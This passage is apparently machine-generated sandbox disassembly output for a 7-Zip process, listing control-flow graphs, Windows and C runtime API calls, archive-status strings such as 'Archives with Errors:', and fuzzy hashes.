                                                                                                                                                                                                                                control_flow_graph 1833 219b5d-219b5f 1834 219b61-219b74 fputs call 1d2300 1833->1834 1835 219b79-219c1f call 21057c call 1d3208 call 1f38e8 free 1833->1835 1834->1835 1843 219c21-219c2b call 21b1c8 1835->1843 1844 219c30-219c33 1835->1844 1843->1844 1846 219c35-219c3c 1844->1846 1847 219c54-219c8b call 21b310 call 1d2130 1844->1847 1846->1847 1849 219c3e-219c4e call 210994 1846->1849 1857 219c9a 1847->1857 1858 219c8d-219c98 call 217414 1847->1858 1853 219c53 1849->1853 1853->1847 1860 219c9d-219ca8 1857->1860 1858->1860 1862 219cb4-219d77 call 1d3404 1860->1862 1863 219caa-219cb3 1860->1863 1867 219d83-219e8a call 2171ec call 1d3404 call 1def70 call 1d3208 call 1f6be0 1862->1867 1868 219d79-219d7d 1862->1868 1863->1862 1879 219ed2-219f53 call 1f5458 1867->1879 1880 219e8c-219eb4 call 1f6e08 1867->1880 1868->1867 1886 219f60-219f68 1879->1886 1887 219f55-219f5b call 21b1c8 1879->1887 1880->1879 1885 219eb6-219ed1 _CxxThrowException 1880->1885 1885->1879 1888 219f6a-219f74 1886->1888 1889 219fbd-219fca 1886->1889 1887->1886 1891 219fb1-219fb9 1888->1891 1892 219f76-219fac call 1d2300 fputs call 1d2300 call 1d2320 call 1d2300 1888->1892 1893 21a02c-21a033 1889->1893 1894 219fcc-219fcf call 1d2300 1889->1894 1891->1889 1892->1891 1896 21a063-21a06a 1893->1896 1897 21a035-21a03a 1893->1897 1903 219fd4-219fdc 1894->1903 1901 21a06c-21a071 1896->1901 1902 21a09e-21a0a1 1896->1902 1897->1896 1900 21a03c-21a05e fputs call 1d26a0 call 1d2300 1897->1900 1900->1896 1905 21a114-21a11b 1901->1905 1908 21a077-21a099 fputs call 1d26a0 call 1d2300 1901->1908 1904 21a0a3-21a0aa 1902->1904 1902->1905 1903->1893 1909 219fde-21a027 fputs call 1d26a0 call 1d2300 fputs call 1d26a0 call 1d2300 1903->1909 1912 21a0d3-21a0da 1904->1912 1913 21a0ac-21a0ce fputs call 1d26a0 call 1d2300 1904->1913 1910 21a11d-21a122 1905->1910 1911 21a15c-21a15f 1905->1911 1908->1902 1909->1893 1920 21a161 1910->1920 1921 21a124-21a133 call 1d2300 1910->1921 1911->1920 1925 21a16c-21a16f 1911->1925 1912->1905 1924 21a0dc-21a0eb call 1d2300 1912->1924 1913->1912 1920->1925 1921->1920 1945 21a135-21a157 fputs call 1d26a0 call 1d2300 1921->1945 1924->1905 1946 21a0ed-21a10f fputs call 1d26a0 call 1d2300 1924->1946 1933 21a320-21a50a free * 2 call 1f6b58 free call 217968 1925->1933 1934 21a175-21a17c 1925->1934 1980 21a53d-21a559 free 1933->1980 1981 21a50c 1933->1981 1941 21a182-21a189 1934->1941 1942 21a2e7-21a2f6 call 1d2300 1934->1942 1941->1942 1948 21a18f-21a192 1941->1948 1942->1933 1958 21a2f8-21a31f fputs call 1d26a0 call 1d2300 1942->1958 1945->1911 1946->1905 1948->1933 1954 21a198-21a1a3 1948->1954 1955 21a1d5-21a1de 1954->1955 1956 21a1a5-21a1cd fputs call 1d26a0 call 1d2300 1954->1956 1963 21a1e0-21a1e3 1955->1963 1964 21a1f3-21a223 fputs call 1d26a0 call 1d2300 1955->1964 1956->1955 1958->1933 1963->1964 1970 21a1e5-21a1ed 1963->1970 1975 21a275-21a2c3 fputs call 1d26a0 call 1d2300 fputs call 1d26a0 call 1d2300 1964->1975 1993 21a225-21a270 fputs call 1d26a0 call 1d2300 fputs call 1d26a0 call 1d2300 1964->1993 1970->1964 1970->1975 2017 21a2c8-21a2cb 1975->2017 1987 21a55b 1980->1987 1988 21a58c-21a5b5 free 1980->1988 1985 21a510-21a526 1981->1985 1991 21a538-21a53b 1985->1991 1992 21a528-21a533 free * 2 1985->1992 1994 21a55f-21a575 1987->1994 1995 21a5c5-21a5c8 1988->1995 1996 21a5b7-21a5be 1988->1996 1991->1980 1991->1985 1992->1991 1993->1975 1999 21a587-21a58a 1994->1999 2000 21a577-21a582 free * 2 1994->2000 2002 21a5e7-21a603 free 1995->2002 2003 21a5ca-21a5e6 _CxxThrowException 1995->2003 1996->1995 2001 21a5c0 call 2166a8 1996->2001 1999->1988 1999->1994 2000->1999 2001->1995 2008 21a605 2002->2008 2009 21a626-21a637 free call 1fa13c 2002->2009 2003->2002 2012 21a609-21a624 free 2008->2012 2016 21a63c-21a675 call 217080 call 1d182c call 217f50 2009->2016 2012->2009 2012->2012 2031 21a677 2016->2031 2032 21a6a8-21a6c9 free 2016->2032 2017->1933 2020 21a2cd-21a2e5 call 1d2300 call 21291c 2017->2020 2020->1933 2033 21a67b-21a691 2031->2033 2035 21a6a3-21a6a6 2033->2035 2036 21a693-21a69e free * 2 2033->2036 2035->2032 2035->2033 2036->2035
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputcfputsfree
                                                                                                                                                                                                                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                                                                                                                • API String ID: 2822829076-727241755
                                                                                                                                                                                                                                • Opcode ID: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
                                                                                                                                                                                                                                • Instruction ID: 4a8b50ceb48a7e0161166495fbbe9d40e9fd1b20411c4299a870aedecdab6353
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31224B32319AC1A1CA34EF25E5943EEB3A1F7A5B80F444126DBAE43B19DF38C5A5C701

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 2649 1fa180-1fa1e9 GetProcAddress * 2 2650 1fa1eb-1fa1fe GetProcAddress 2649->2650 2651 1fa214-1fa22a GetProcAddress 2649->2651 2652 1fa233-1fa23e 2650->2652 2653 1fa200-1fa20d 2650->2653 2651->2652 2654 1fa22c-1fa22e 2651->2654 2656 1fa729 2652->2656 2657 1fa244-1fa2f0 call 1d3208 call 1f8928 2652->2657 2653->2652 2661 1fa20f 2653->2661 2655 1fa72b-1fa73e 2654->2655 2656->2655 2664 1fa648 2657->2664 2665 1fa2f6-1fa30a 2657->2665 2661->2655 2666 1fa718-1fa727 call 1f94a8 2664->2666 2667 1fa31c-1fa321 2665->2667 2668 1fa30c-1fa31a 2665->2668 2666->2655 2671 1fa328-1fa32b 2667->2671 2668->2671 2673 1fa32d-1fa345 call 1dae2c call 1f94a8 2671->2673 2674 1fa34a-1fa350 2671->2674 2690 1fa634-1fa63d 2673->2690 2675 1fa36f-1fa37d SysStringByteLen 2674->2675 2676 1fa352-1fa36a call 1dae2c call 1f94a8 2674->2676 2679 1fa64d-1fa65d call 1dae2c 2675->2679 2680 1fa383-1fa3e3 call 1dae2c * 2 call 1d3208 * 2 call 1f8928 2675->2680 2676->2690 2679->2666 2701 1fa3e9-1fa40c call 1f8928 2680->2701 2702 1fa662-1fa678 free * 2 2680->2702 2690->2657 2693 1fa643 2690->2693 2693->2656 2705 1fa67d-1fa693 free * 2 2701->2705 2706 1fa412-1fa485 call 1f9d98 call 1f87a8 call 1f8860 2701->2706 2702->2666 2705->2666 2713 1fa48b-1fa49c 2706->2713 2714 1fa698-1fa6ae free * 2 2706->2714 2715 1fa4ee-1fa51b call 1f9380 2713->2715 2716 1fa49e-1fa4a5 2713->2716 2714->2666 2722 1fa521-1fa526 2715->2722 2723 1fa6b0-1fa6d1 free * 3 2715->2723 2718 1fa4ab-1fa4d9 call 1f87a8 2716->2718 2724 1fa4db-1fa4de 2718->2724 2725 1fa4e5-1fa4ec 2718->2725 2726 1fa528-1fa53f call 1f98d4 2722->2726 2727 1fa541-1fa564 call 1f9380 2722->2727 2723->2666 2724->2725 2725->2715 2725->2718 2732 1fa583-1fa5b7 call 1f8860 2726->2732 2733 1fa56a-1fa57e call 1fa034 2727->2733 2734 1fa6d3-1fa6f4 free * 3 2727->2734 2738 1fa5bd-1fa5c0 2732->2738 2739 1fa6f6-1fa715 free * 3 2732->2739 2733->2732 2734->2666 2740 1fa5cf-1fa5e4 call 1d2130 2738->2740 2741 1fa5c2-1fa5ca 2738->2741 2739->2666 2744 1fa5f8 2740->2744 2745 1fa5e6-1fa5f1 call 1f9af0 2740->2745 2741->2740 2747 1fa5fb-1fa62f call 1db8f0 free * 3 call 1f94a8 2744->2747 2748 1fa5f6 2745->2748 2747->2690 2748->2747
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                                                                • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                                                                                                                • API String ID: 190572456-3984264347
                                                                                                                                                                                                                                • Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                                                • Instruction ID: 0c252e906d0347f1f0c07690ad1c104416afa1ffaae58609ea32486d1ea5f37b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D18672319AC496C720EB21E8807AEB3A5FBE5780F845512EB8E87B19DF7CD545CB01

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 2752 1d70c8-1d70e4 call 1d7d4c 2754 1d70e9-1d70ec 2752->2754 2755 1d70ee-1d70f0 2754->2755 2756 1d70f9-1d7103 call 1d9d84 2754->2756 2755->2756 2757 1d70f2-1d70f4 2755->2757 2761 1d710c-1d7136 call 1d9ed8 call 1d3274 call 1d376c 2756->2761 2762 1d7105-1d7107 2756->2762 2759 1d7449-1d7458 2757->2759 2769 1d7138-1d7141 2761->2769 2770 1d715b-1d7175 call 1d3314 2761->2770 2762->2759 2769->2770 2772 1d7143-1d7145 2769->2772 2777 1d717a-1d7186 call 1da170 2770->2777 2774 1d714c-1d7155 2772->2774 2775 1d7147 2772->2775 2774->2770 2776 1d73f1-1d73fe free 2775->2776 2776->2759 2780 1d7188-1d7195 CreateDirectoryW 2777->2780 2781 1d71aa-1d71ac 2777->2781 2782 1d719b-1d71a4 GetLastError 2780->2782 2783 1d7360-1d7364 2780->2783 2784 1d727d-1d7286 GetLastError 2781->2784 2785 1d71b2-1d71d2 call 1d3208 call 1da7ec 2781->2785 2782->2781 2782->2784 2786 1d73c9-1d73e1 free * 2 2783->2786 2787 1d7366-1d7379 call 1d9ab0 2783->2787 2789 1d7288-1d72b5 call 1d7d28 call 1d3208 call 1d7ebc 2784->2789 2790 1d72e4-1d72ed GetLastError 2784->2790 2809 1d71d8-1d71e7 CreateDirectoryW 2785->2809 2810 1d7273-1d7278 free 2785->2810 2786->2759 2801 1d737b-1d737f 2787->2801 2802 1d7381 2787->2802 2825 1d72b7-1d72c4 free 2789->2825 2826 1d72c6-1d72db free 2789->2826 2792 1d73e3-1d73ee free 2790->2792 2793 1d72f3-1d7301 call 1d376c 2790->2793 2792->2776 2807 1d7307-1d7309 2793->2807 2808 1d7432-1d7447 free * 2 2793->2808 2806 1d7385-1d73a3 call 1d3460 call 1d6c84 2801->2806 2802->2806 2835 1d73ad-1d73c4 free * 2 2806->2835 2836 1d73a5-1d73a9 2806->2836 2807->2808 2815 1d730f-1d7316 2807->2815 2808->2759 2811 1d71ed-1d71f6 GetLastError 2809->2811 2812 1d7356-1d735b free 2809->2812 2810->2784 2816 1d71f8-1d7202 free 2811->2816 2817 1d7207-1d7230 call 1d7d28 call 1d3208 call 1d7ebc 2811->2817 2812->2783 2820 1d732c-1d7332 2815->2820 2821 1d7318-1d731c 2815->2821 2816->2790 2841 1d724f-1d7271 free * 2 2817->2841 2842 1d7232-1d724a free * 2 2817->2842 2822 1d7419-1d7430 free * 2 2820->2822 2823 1d7338-1d733c 2820->2823 2828 1d7400-1d7417 free * 2 2821->2828 2829 1d7322-1d7326 2821->2829 2822->2759 2823->2777 2830 1d7342-1d7351 2823->2830 2825->2790 2832 1d72e0-1d72e2 2826->2832 2828->2759 2829->2820 2829->2828 2830->2777 2832->2783 2832->2790 2835->2759 2836->2787 2838 1d73ab 2836->2838 2838->2786 2841->2832 2842->2790
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNELBASE ref: 001D7D6E
                                                                                                                                                                                                                                  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNEL32 ref: 001D7DA5
                                                                                                                                                                                                                                  • Part of subcall function 001D7D4C: free.MSVCRT ref: 001D7DB2
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D73F6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                                                                                • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                • Instruction ID: 61c53a6120d62c25607e5645eb1c54979fe589874a0baf20fdf938211e27043d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2281512221C58192CA20EF21E45166EA331FBE5784F445123FF9E877A9EF38D945D711

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 2843 1d7ebc-1d7ee3 call 1d9b68 2846 1d7ee9-1d7f26 call 1d339c call 1d9ce4 2843->2846 2847 1d7fca-1d7fd6 call 1d9ddc 2843->2847 2859 1d7f8c-1d7fa4 call 1d91dc 2846->2859 2860 1d7f28-1d7f2c 2846->2860 2853 1d7fdc-1d7fe4 2847->2853 2854 1d8253-1d828a call 1d9d0c call 1d9b30 2847->2854 2853->2854 2856 1d7fea-1d800c call 1d3274 * 2 2853->2856 2870 1d828c-1d8294 2854->2870 2871 1d8306-1d830b 2854->2871 2878 1d800e-1d8017 2856->2878 2879 1d801b-1d8020 2856->2879 2874 1d7fa8-1d7fac 2859->2874 2875 1d7fa6 2859->2875 2860->2859 2863 1d7f2e-1d7f77 call 1dabb0 2860->2863 2863->2859 2877 1d7f79-1d7f87 2863->2877 2870->2871 2876 1d8296-1d82a5 call 1d7d4c 2870->2876 2883 1d830d-1d8312 2871->2883 2884 1d8318-1d831c 2871->2884 2881 1d7fae-1d7fb3 2874->2881 2882 1d7fb6 2874->2882 2880 1d7fb9-1d7fc5 call 1d89d8 2875->2880 2892 1d84f2-1d8500 call 1d7978 2876->2892 2903 1d82ab-1d82b2 2876->2903 2888 1d8519-1d8524 2877->2888 2878->2879 2889 1d8040-1d804c call 1d3670 2879->2889 2890 1d8022-1d803e call 1d2880 2879->2890 2880->2888 2881->2882 2882->2880 2883->2884 2883->2892 2885 1d831e-1d8330 call 1d7d4c 2884->2885 2886 1d8377-1d8381 call 1d9c80 2884->2886 2885->2892 2907 1d8336-1d833d 2885->2907 2886->2892 2908 1d8387-1d8396 2886->2908 2900 1d8051-1d8062 call 1d9ce4 2889->2900 2890->2889 2890->2900 2904 1d8505-1d8506 2892->2904 2916 1d8064-1d8067 2900->2916 2917 1d80b1-1d80bb call 1d7ebc 2900->2917 2903->2892 2909 1d82b8-1d82eb call 1d339c 2903->2909 2910 1d8509-1d8511 call 1d794c 2904->2910 2907->2892 2912 1d8343-1d8372 2907->2912 2908->2892 2913 1d839c-1d83a6 call 1d9ab0 2908->2913 2924 1d82ed-1d82f8 2909->2924 2925 1d82fc-1d8301 2909->2925 2920 1d8516 2910->2920 2912->2910 2913->2892 2930 1d83ac-1d83c2 call 1d3274 2913->2930 2921 1d8069-1d806c 2916->2921 2922 1d8075-1d80a3 2916->2922 2929 1d80c1-1d8108 call 1d3314 call 1d3208 call 1d7ce0 2917->2929 2934 1d823e-1d824e free * 2 2917->2934 2920->2888 2921->2917 2927 1d806e-1d8073 2921->2927 2928 1d80a5-1d80af call 1d3404 2922->2928 2922->2929 2924->2925 2925->2910 2927->2917 2927->2922 2928->2929 2953 1d815a-1d8185 free * 2 call 1d794c free 2929->2953 2954 1d810a-1d8111 2929->2954 2940 1d83c4-1d83ce call 1d2fec 2930->2940 2941 1d83d2-1d83f2 2930->2941 2934->2854 2940->2941 2944 1d83f4-1d83fe call 1d2fec 2941->2944 2945 1d8402-1d8437 call 1d7978 2941->2945 2944->2945 2955 1d8439-1d8457 wcscmp 2945->2955 2956 1d8484-1d849d call 1d7d4c 2945->2956 2968 1d822d-1d8239 free 2953->2968 2957 1d818a-1d81c1 SetLastError free * 2 call 1d794c free 2954->2957 2958 1d8113-1d8124 call 1d2748 2954->2958 2959 1d847c 2955->2959 2960 1d8459-1d8477 call 1d339c free 2955->2960 2969 1d849f-1d84a1 2956->2969 2970 1d84b3-1d84f0 call 1d339c free 2956->2970 2957->2968 2977 1d812a-1d8158 free call 1d3208 call 1d7ce0 2958->2977 2978 1d81c3-1d81ca 2958->2978 2959->2956 2960->2910 2968->2888 2974 1d84a7-1d84b1 free 2969->2974 2975 1d84a3-1d84a5 2969->2975 2970->2910 2974->2892 2975->2970 2975->2974 2977->2953 2977->2954 2979 1d81cc-1d81d1 2978->2979 2980 1d81e0-1d822a call 1d362c free * 2 call 1d794c free 2978->2980 2979->2980 2983 1d81d3-1d81dc 2979->2983 2980->2968 2983->2980
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D812F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D816A
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D817F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D8232
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetModuleHandleW.KERNEL32 ref: 001DABD1
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetProcAddress.KERNEL32 ref: 001DABE1
                                                                                                                                                                                                                                  • Part of subcall function 001DABB0: GetDiskFreeSpaceW.KERNEL32 ref: 001DAC32
                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 001D818F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D819B
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D81A6
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D81BB
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D8243
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D824E
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D815F
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                                                                                                                • String ID: :$:$DATA$\
                                                                                                                                                                                                                                • API String ID: 4130059181-1004618218
                                                                                                                                                                                                                                • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                • Instruction ID: c5a09588bb05a58ddbd6e665662227ee5203fa457dddddff6e2938926b93d2f7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1202E773504680D6CB20DF29E59026EB770F7A5750F808227E79E87B68EF34D9A6CB04

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 2991 213e84-213eb5 2992 2141e8 2991->2992 2993 213ebb 2991->2993 2995 2141ea-2141fd 2992->2995 2994 213ebe-213efa fputs call 212e24 2993->2994 2998 213f51-213f59 2994->2998 2999 213efc-213f03 2994->2999 3002 213f64-213f6f 2998->3002 3003 213f5b-213f62 2998->3003 3000 213f05-213f1d fputs call 1d2300 2999->3000 3001 213f1f-213f4c call 1d3274 call 2130cc free 2999->3001 3000->2998 3001->2998 3004 213f73-213f9e call 212e24 call 213148 3002->3004 3003->3004 3015 213fa0-213fce fputs * 2 call 1d2640 call 1d2300 3004->3015 3016 213fd3-213fe3 call 213034 3004->3016 3015->3016 3020 213fe8-213fea 3016->3020 3020->2995 3022 213ff0-213ff7 3020->3022 3023 213ff9-214027 fputs * 2 call 1d26a0 call 1d2300 3022->3023 3024 21402c-21403c 3022->3024 3023->3024 3024->2995 3029 214042-214048 3024->3029 3030 21404a-214079 3029->3030 3031 2140af-2140b9 3029->3031 3036 2141b9 3030->3036 3037 21407f-214096 call 213034 3030->3037 3032 21419d-2141b1 3031->3032 3033 2140bf-2140e0 fputs 3031->3033 3032->2994 3035 2141b7 3032->3035 3033->3032 3039 2140e6-2140fc 3033->3039 3035->2992 3041 2141bd-2141ca SysFreeString 3036->3041 3044 2141bb 3037->3044 3045 21409c-2140ad SysFreeString 3037->3045 3039->3032 3042 214102-214133 3039->3042 3041->2995 3047 214139-214162 3042->3047 3048 2141cc 3042->3048 3044->3041 3045->3030 3045->3031 3051 214164-214197 call 212ecc call 1dae2c SysFreeString 3047->3051 3052 2141ce-2141d8 call 1dae2c 3047->3052 3049 2141d9-2141e6 SysFreeString 3048->3049 3049->2995 3051->3032 3051->3042 3052->3049
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$FreeString$fputcfree
                                                                                                                                                                                                                                • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                                                                                                                • API String ID: 2701146716-1919703766
                                                                                                                                                                                                                                • Opcode ID: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                                                                                                                • Instruction ID: 6bc815c0465cb8888c230135113aaea6677290f740a622c02de41a9f5cad5383
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B919136224A8592DB10EF22E9547AE73B1F7A9BC4F405122EF5E47B18DF38C9A5C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 3059 1df71c-1df74e call 1d1610 3062 1df774-1df7c2 _isatty * 3 3059->3062 3063 1df750-1df773 call 1f02a0 _CxxThrowException 3059->3063 3065 1df7d4 3062->3065 3066 1df7c4-1df7c8 3062->3066 3063->3062 3069 1df7d9-1df81c 3065->3069 3066->3065 3068 1df7ca-1df7ce 3066->3068 3068->3065 3070 1df7d0-1df7d2 3068->3070 3071 1df81e-1df822 3069->3071 3072 1df82a 3069->3072 3070->3069 3071->3072 3073 1df824-1df828 3071->3073 3074 1df830-1df834 3072->3074 3073->3072 3073->3074 3075 1df83c-1df846 3074->3075 3076 1df836 3074->3076 3077 1df848-1df84e 3075->3077 3078 1df854-1df85e 3075->3078 3076->3075 3077->3078 3079 1df86c-1df876 3078->3079 3080 1df860-1df866 3078->3080 3081 1df878-1df87e 3079->3081 3082 1df884-1df88e 3079->3082 3080->3079 3081->3082 3083 1df890-1df89d 3082->3083 3084 1df8f3-1df8fd 3082->3084 3087 1df89f-1df8a9 3083->3087 3088 1df8ab-1df8be call 1ded34 3083->3088 3085 1df8ff-1df917 3084->3085 3086 1df91a-1df931 call 1dac74 * 2 3084->3086 3085->3086 3096 1df936-1df940 3086->3096 3087->3084 3094 1df8e6-1df8ed 3088->3094 3095 1df8c0-1df8e5 call 1f02a0 _CxxThrowException 3088->3095 3094->3084 3095->3094 3098 1df9dd-1df9e7 3096->3098 3099 1df946-1df95c 3096->3099 3103 1df9ed-1df9fa 3098->3103 3104 1dfa94-1dfa9c 3098->3104 3101 1df95e-1df963 3099->3101 3102 1df965-1df977 wcscmp 3099->3102 3105 1df9bb-1df9c2 call 1dad0c 3101->3105 3102->3105 3106 1df979-1df98c call 1ded34 3102->3106 3103->3104 3107 1dfa00-1dfa1c call 1d2bc8 call 1d2d34 3103->3107 3105->3098 3114 1df9c4-1df9d7 call 21d4c0 call 1dac74 3105->3114 3115 1df98e-1df9b3 call 1f02a0 _CxxThrowException 3106->3115 3116 1df9b4 3106->3116 3122 1dfa4f-1dfa74 call 1f02a0 _CxxThrowException 3107->3122 3123 1dfa1e-1dfa3b call 1d3f78 3107->3123 3114->3098 3115->3116 